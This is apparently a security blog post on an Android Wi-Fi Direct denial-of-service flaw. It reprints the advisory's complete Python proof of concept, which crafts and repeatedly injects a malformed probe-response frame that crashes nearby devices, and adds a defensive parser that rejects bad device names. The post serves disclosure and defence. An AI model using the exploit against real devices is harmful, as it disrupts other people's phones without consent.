Some Android Devices Vulnerable to DoS from WiFi Direct Vulnerability


Some Android devices are vulnerable to a denial of service (DoS) from a WiFi Direct vulnerability discovered by Andres Blanco of CoreLabs, Core Security's research team.

An attacker in radio range could send a specially crafted 802.11 Probe Response frame that causes the Dalvik subsystem to reboot because of an unhandled exception in the WifiMonitor class.

Vulnerable packages include:

  •  Nexus 5 – Android 4.4.4
  •  Nexus 4 – Android 4.4.4
  •  LG D806 – Android 4.2.2
  •  Samsung SM-T310 – Android 4.2.2
  •  Motorola RAZR HD – Android 4.1.2

Core Security disclosed the vulnerability on SecLists. The bug is in Android's modified wpa_supplicant, which provides the interface between the wireless driver and the Android platform.

If the attacker sends a malformed wpa_supplicant value, Android's WifiP2pDevice class throws an IllegalArgumentException, crashing the device. In the advisory's words: "a device name attribute with specific bytes generates a malformed supplicant event string that ends up throwing the IllegalArgumentException".

Here is the PoC from the SecLists post:

This PoC was implemented using the open source library Lorcon [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.
/-----
#!/usr/bin/env python

import sys
import time
import struct

import PyLorcon2


def get_probe_response(source, destination, channel):
    frame = str()
    frame += "\x50\x00"  # Frame Control
    frame += "\x00\x00"  # Duration
    frame += destination
    frame += source
    frame += source
    frame += "\x00\x00"  # Sequence Control
    frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
    frame += "\x64\x00"  # Beacon Interval
    frame += "\x30\x04"  # Capabilities Information
    # SSID IE
    frame += "\x00"
    frame += "\x07"
    frame += "DIRECT-"
    # Supported Rates
    frame += "\x01"
    frame += "\x08"
    frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"
    # DS Parameter Set
    frame += "\x03"
    frame += "\x01"
    frame += struct.pack("B", channel)
    # P2P
    frame += "\xDD"
    frame += "\x27"
    frame += "\x50\x6F\x9A"
    frame += "\x09"
    # P2P Capabilities
    frame += "\x02"  # ID
    frame += "\x02\x00"  # Length
    frame += "\x21\x00"
    # P2P Device Info
    frame += "\x0D"  # ID
    frame += "\x1B\x00"  # Length
    frame += source
    frame += "\x01\x88"
    frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
    frame += "\x00"
    frame += "\x10\x11"
    frame += "\x00\x06"
    frame += "fafa\xFA\xFA"
    return frame


def str_to_mac(address):
    return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage:"
        print "  poc.py  "
        print "Example:"
        print "  poc.py wlan0 00:11:22:33:44:55"
        sys.exit(-1)

    iface = sys.argv[1]
    destination = str_to_mac(sys.argv[2])

    context = PyLorcon2.Context(iface)
    context.open_injmon()

    channel = 1
    source = str_to_mac("00:11:22:33:44:55")

    frame = get_probe_response(source, destination, channel)

    print "Injecting PoC."
    for i in range(100):
        context.send_bytes(frame)
        time.sleep(0.100)
-----/
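The advisory's point is that the framework trusted the device name bytes carried in the P2P Device Info attribute and let a parse failure escape as an unhandled exception. The following Python 3 script is an added example, written for this post and not taken from the Core Security advisory or from Android's own WifiP2pDevice/WifiMonitor code. It walks the information elements of a probe-response body, locates the Wi-Fi Direct vendor IE (OUI 50:6F:9A, type 0x09), extracts the Device Info device name, and reports it as malformed instead of raising. The validation rules (strict UTF-8, printable characters, at most 32 bytes, which is the WSC Device Name limit) are my assumptions; the sample IE bodies are constructed inline and are not captured traffic. A monitor-mode capture tool or a defensive parser can use the same walk to flag frames whose device name would not round-trip cleanly through the supplicant event string.

```python
#!/usr/bin/env python3
"""Defensive parser for the Wi-Fi P2P (Wi-Fi Direct) vendor IE in an 802.11
management frame body.  It extracts the P2P Device Info device name and
reports malformed names rather than raising, which is the defensive
counterpart of the unhandled-exception crash described in the advisory."""
import struct

P2P_OUI = b"\x50\x6F\x9A"
P2P_OUI_TYPE = 0x09
ATTR_DEVICE_INFO = 0x0D
WPS_ATTR_DEVICE_NAME = 0x1011
MAX_DEVICE_NAME = 32  # assumption: WSC Device Name attribute limit


def iter_ies(body):
    """Yield (element_id, data) for each IE (1-byte id, 1-byte length).
    Stops cleanly on a truncated element instead of reading past the end."""
    off = 0
    while off + 2 <= len(body):
        eid, length = body[off], body[off + 1]
        if off + 2 + length > len(body):
            return  # truncated IE: ignore the remainder
        yield eid, body[off + 2:off + 2 + length]
        off += 2 + length


def iter_p2p_attrs(payload):
    """Yield (attr_id, data) for P2P attributes (1-byte id, 2-byte LE length)."""
    off = 0
    while off + 3 <= len(payload):
        attr_id = payload[off]
        (length,) = struct.unpack_from("<H", payload, off + 1)
        if off + 3 + length > len(payload):
            return
        yield attr_id, payload[off + 3:off + 3 + length]
        off += 3 + length


def parse_device_name(dev_info):
    """Return (status, name) for a P2P Device Info attribute body.
    status is 'ok', 'malformed' or 'absent'; name is None unless 'ok'."""
    # Fixed part: P2P Device Address (6), Config Methods (2),
    # Primary Device Type (8), Number of Secondary Device Types (1).
    if len(dev_info) < 17:
        return "malformed", None
    off = 17 + 8 * dev_info[16]  # skip any secondary device types
    # Device Name is a WPS attribute: 2-byte BE id, 2-byte BE length, value.
    if off + 4 > len(dev_info):
        return "malformed", None
    attr_id, length = struct.unpack_from(">HH", dev_info, off)
    if attr_id != WPS_ATTR_DEVICE_NAME:
        return "absent", None
    raw = dev_info[off + 4:off + 4 + length]
    if len(raw) != length or length > MAX_DEVICE_NAME:
        return "malformed", None
    try:
        name = raw.decode("utf-8")  # strict decode rejects stray 0xFA bytes
    except UnicodeDecodeError:
        return "malformed", None
    if not name.isprintable():
        return "malformed", None
    return "ok", name


def inspect_frame_body(body):
    """Scan a probe-response/beacon body for P2P Device Info device names.
    Returns one (status, name) tuple per Device Info attribute found."""
    results = []
    for eid, data in iter_ies(body):
        if eid != 0xDD or len(data) < 4:
            continue
        if data[:3] != P2P_OUI or data[3] != P2P_OUI_TYPE:
            continue
        for attr_id, attr in iter_p2p_attrs(data[4:]):
            if attr_id == ATTR_DEVICE_INFO:
                results.append(parse_device_name(attr))
    return results


def p2p_ie(device_name_bytes):
    """Build a P2P vendor IE with one Device Info attribute carrying the given
    device-name bytes.  Constructed test input only, not captured traffic."""
    dev_addr = bytes.fromhex("001122334455")  # constructed device address
    dev_info = (dev_addr + b"\x01\x88"                       # config methods
                + b"\x00\x0A\x00\x50\xF2\x04\x00\x05"        # primary device type
                + b"\x00"                                    # no secondary types
                + struct.pack(">HH", WPS_ATTR_DEVICE_NAME, len(device_name_bytes))
                + device_name_bytes)
    payload = (P2P_OUI + bytes([P2P_OUI_TYPE]) + bytes([ATTR_DEVICE_INFO])
               + struct.pack("<H", len(dev_info)) + dev_info)
    return bytes([0xDD, len(payload)]) + payload


# Constructed sample frame bodies: an SSID IE followed by a P2P IE.
SSID_IE = b"\x00\x07DIRECT-"
GOOD_BODY = SSID_IE + p2p_ie(b"Nexus-5")
BAD_BODY = SSID_IE + p2p_ie(b"fafa\xFA\xFA")  # non-UTF-8 device name
TRUNCATED_BODY = GOOD_BODY[:-3]  # IE cut short, must not raise

if __name__ == "__main__":
    for label, body in (("good", GOOD_BODY), ("bad", BAD_BODY),
                        ("truncated", TRUNCATED_BODY)):
        print(label, inspect_frame_body(body))
```

The parser never raises on attacker-controlled lengths or bytes: every length is checked against the remaining buffer before slicing, and the name is decoded strictly so an invalid sequence becomes a "malformed" verdict rather than an exception propagating to whatever thread called the parser.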
William Fieldhouse

I currently work full time as a penetration tester and have been involved within the IT security industry for over a decade. I also love to pioneer any forms of new technology and ideologies for future advancements. Feel free to contact me at [email protected]
